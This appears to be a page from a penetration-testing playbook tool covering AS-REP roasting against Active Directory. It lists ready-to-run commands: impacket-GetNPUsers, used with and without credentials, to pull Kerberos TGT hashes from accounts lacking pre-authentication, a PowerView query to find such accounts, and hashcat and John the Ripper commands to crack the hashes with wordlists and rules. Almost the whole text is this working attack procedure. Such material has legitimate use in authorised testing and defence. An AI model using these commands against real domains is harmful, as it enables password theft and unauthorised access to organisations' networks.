next-move engine
You have Crackable hash
1 high-yield move from here, ordered the way the engagement runs. Open any move to see the exact commands.
- open full techniqueWhat it is
Accounts with "Do not require Kerberos pre-authentication" enabled allow you to request encrypted TGTs without a password. Hash is crackable offline.
Step 1: Find vulnerable accountsFrom Linux (without creds · pure unauthenticated attack):
impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass -format hashcat | tee hashes/asrep.txt
With credentials (more reliable):
impacket-GetNPUsers <DOMAIN>/<USER>:<PASS> -dc-ip <DC-IP> -request | tee hashes/asrep.txt
From Windows (with PowerView):
Get-DomainUser -PreauthNotRequired | Select SamAccountName
Step 2: Crackhashcat -m 18200 hashes/asrep.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 hashes/asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
john --wordlist=/usr/share/wordlists/rockyou.txt hashes/asrep.txt --format=krb5asrep